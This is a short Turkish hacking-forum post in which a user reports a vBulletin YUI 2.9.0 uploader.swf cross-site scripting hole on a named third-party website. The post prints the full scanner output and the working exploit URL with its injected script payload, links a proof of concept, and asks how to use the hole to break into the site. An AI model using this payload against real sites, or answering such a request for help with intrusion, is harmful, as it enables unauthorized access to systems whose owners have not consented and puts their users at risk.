⌘K

vbulletin açık

TheNet

herkese merhabalar vbscan ile tarattığım bir sitede şu açığı buldum: [+] Checking vBulletin YUI 2.9.0 XSS [++] uploader.swf is vulnerable...

herkese merhabalar vbscan ile tarattığım bir sitede şu açığı buldum:
Kod: 
[+] Checking vBulletin YUI 2.9.0 XSS
[++] uploader.swf is vulnerable
http://www.gizlimabet.com//clientscript/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert(/XSS/);}//
 POC : https://packetstormsecurity.com/files/124746/vBulletin-YUI-2.9.0-Cross-Site-Scripting.html
bu açığı kullanarak nasıl bu siteye sızabilirim ? iyi çalışmalar
 
Yanıt için giriş yapmanız veya üye olmanız gerekir.
131,765Konular
3,271,135Mesajlar
316,125Kullanıcılar
yunus6534Son Üye

About Us & Legal Notice

Yasal Uyarı: spyhackerz.org, 5651 sayılı Kanun kapsamında “Yer Sağlayıcı”dır. Sitedeki içerikler, X, Instagram ve Facebook’ta olduğu gibi, ön onay olmadan tamamen kullanıcılar tarafından paylaşılır. Bu nedenle spyhackerz.org, kullanıcı içeriklerini veya hukuka aykırı paylaşımları izlemek, denetlemek ve araştırmakla yükümlü değildir. Site bünyesinde herhangi bir “saldırı ekibi” bulunmamaktadır ve Türkiye’deki internet sitelerine yönelik zararlı faaliyet yürütülmez. SPYHACKERZ, üyelerin bireysel olarak gerçekleştirdiği hacking içerikli forum faaliyetlerinden sorumlu değildir. spyhackerz.org adı kullanılarak bir saldırı yapılması halinde tüm sorumluluk yalnızca ilgili üyeye aittir.
Üst Alt